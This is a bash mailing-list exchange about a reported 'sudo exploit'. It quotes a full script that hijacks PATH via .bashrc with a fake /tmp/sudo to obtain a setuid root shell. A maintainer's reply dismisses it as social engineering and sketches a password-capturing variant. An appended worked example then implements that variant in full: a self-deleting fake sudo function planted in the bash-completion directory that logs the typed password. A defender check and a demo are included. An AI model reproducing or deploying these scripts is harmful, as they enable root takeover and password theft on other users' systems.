On 4/12/19 5:38 PM, bakzero wrote:
> Hi,
> I wrote an exploit which allows becoming root when a normal user uses sudo.
> The following code adds the /tmp path to the .bashrc configuration file. Then
> when the user executes sudo he runs the fake one, giving you a root shell. Just
> run it; when the normal user uses sudo you will get a root shell.
>
> chmod +x ./exploit.sh && ./exploit.sh
>
> #!/bin/bash
>
> PAYLOAD="/bin/bash"
> CFILE=".temp0000"
> PRIV="root"
> COLOR='\033[1;31m'
>
> echo -e "$COLOR"
>
> # Put /tmp first on the victim's PATH so /tmp/sudo shadows /usr/bin/sudo.
> echo -e "\n - Adding /tmp path on $HOME/.bashrc"; sleep 1
> echo export PATH=/tmp:$PATH >> $HOME/.bashrc
> echo -e " - Creating C executable with setuid 0 "
> sleep 1
> # Tiny setuid wrapper that spawns the payload as root once chown/chmod 4755 has run.
> echo "#include <stdlib.h>" >/tmp/$CFILE.c
> echo "#include <unistd.h>" >>/tmp/$CFILE.c
> echo "int main(void) {" >>/tmp/$CFILE.c
> echo "setuid(0);" >>/tmp/$CFILE.c
> echo "system(\"$PAYLOAD\"); }" >>/tmp/$CFILE.c
> /usr/bin/gcc /tmp/$CFILE.c -o /tmp/$CFILE &> /dev/null
> rm -rf /tmp/$CFILE.c
> echo -e " - Creating sudo script which will be executed by the victim ";
> sleep 1
> # Fake sudo: uses the victim's real sudo session to make the wrapper root-owned
> # and setuid, then passes the original command through so nothing looks wrong.
> echo "#!/bin/bash" > /tmp/sudo
> echo "/usr/bin/sudo chown root:root /tmp/$CFILE && /usr/bin/sudo chmod 4755 /tmp/$CFILE" >> /tmp/sudo
> echo "/usr/bin/sudo \"\$@\"" >>/tmp/sudo && chmod +x /tmp/sudo
> echo " - Wait while the victim open a shell and execute sudo"
> while [[ $(stat -c '%U' /tmp/$CFILE) != $PRIV ]] ;
> do
> sleep 1
> done
> echo -e " - Root shell with SETUID 0 created on $CFILE"; sleep 1
> echo -e " - Cleaning sudo script and path line\n"; sleep 1
> sed -i -e '/^export PATH/d' $HOME/.bashrc
> rm -rf /tmp/sudo
> /tmp/$CFILE
>
> Impact
>
> An attacker logged into a system as a normal user, using a sudo weakness, can
> escalate to root.
That's not a bug in bash, and it's not even a bug. Tricking the user into running arbitrary code is the oldest trick in the book.

A much more subtle trick would be to add $HOME/.local/share/bash-completion/completions/sudo and define a sudo function that prompts for the password, writes it to wherever you want, echoes a message pretending that you mistyped the password, and calls the original command again after undefining itself and doing cleanup.

But that still isn't a bug in bash. It's more along the lines of a social engineering exploit.

--
Eli Schwartz
Arch Linux Bug Wrangler and Trusted User
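The completion-file variant sketched in the reply above, worked through as an added example (this is not code from the thread, from bash, or from the bash-completion project), together with the check a defender would run against it. It assumes bash-completion's per-user directory ${XDG_DATA_HOME:-$HOME/.local/share}/bash-completion/completions, a loot file under $TMPDIR, and, for the sandboxed demo only, a stub sudo placed first on PATH; the sample password is constructed.

```bash
#!/usr/bin/env bash
# Added example, not code from the thread: a sudo() shell function planted in
# the user's per-user bash-completion directory, plus a defender's check.
# Assumptions: bash-completion's per-user completions dir, a loot file under
# $TMPDIR, and (demo only) a stub sudo on PATH so nothing real is touched.

# bash-completion sources this file lazily, the first time the user
# tab-completes "sudo ...". No .bashrc edit and no PATH change are needed.
user_sudo_completion_file() {
    printf '%s\n' "${XDG_DATA_HOME:-$HOME/.local/share}/bash-completion/completions/sudo"
}

# Attacker step: plant the fake completion file.
plant_fake_sudo_completion() {
    local file; file="$(user_sudo_completion_file)"
    mkdir -p "$(dirname "$file")"
    cat > "$file" <<'EOF'
# Shadows the real sudo for exactly one invocation.
sudo() {
    local pw
    read -rsp "[sudo] password for ${USER:-$(id -un)}: " pw   # mimic sudo's prompt
    echo
    printf '%s\n' "$pw" >> "${TMPDIR:-/tmp}/.sudo-loot"        # assumed drop location
    echo "Sorry, try again."                                   # blame a typo
    unset -f sudo                                              # undefine itself
    rm -f "${XDG_DATA_HOME:-$HOME/.local/share}/bash-completion/completions/sudo"
    command sudo "$@"                                          # hand off to the real one
}
EOF
}

# Defender check: returns 0 if clean, 1 if sudo resolves to a shell function in
# this shell or a per-user sudo completion file exists.
check_sudo_hijack() {
    local rc=0 file; file="$(user_sudo_completion_file)"
    if [ "$(type -t sudo 2>/dev/null)" = "function" ]; then
        echo "warning: 'sudo' resolves to a shell function, not a binary" >&2; rc=1
    fi
    if [ -e "$file" ]; then
        echo "warning: per-user completion file $file exists" >&2; rc=1
    fi
    return "$rc"
}

# Self-contained demo in a throwaway HOME with a stub sudo on PATH.
# Simulates the victim's shell sourcing the completion file and then running
# sudo; prints the password that landed in the loot file.
demo_capture() {
    local sandbox victim
    sandbox="$(mktemp -d)"
    mkdir -p "$sandbox/bin" "$sandbox/home"
    printf '#!/bin/sh\necho "real sudo ran: $*"\n' > "$sandbox/bin/sudo"
    chmod +x "$sandbox/bin/sudo"
    (
        unset XDG_DATA_HOME
        export HOME="$sandbox/home" TMPDIR="$sandbox" PATH="$sandbox/bin:$PATH"
        plant_fake_sudo_completion
        victim="$(user_sudo_completion_file)"
        # Constructed victim input: the password typed at the fake prompt.
        printf 'hunter2\n' | bash -c 'source "$1"; sudo -n true' _ "$victim" >/dev/null
    )
    cat "$sandbox/.sudo-loot"
    rm -rf "$sandbox"
}
```

The function only exists once bash-completion has loaded the file, i.e. after the user has tab-completed a sudo command line, and it deletes both itself and the file on first use, so the only lasting trace is the loot file. In the victim's own shell, `type -a sudo` (or the check above) shows whether `sudo` is a function rather than the binary, and the per-user completions directory is worth a look during triage.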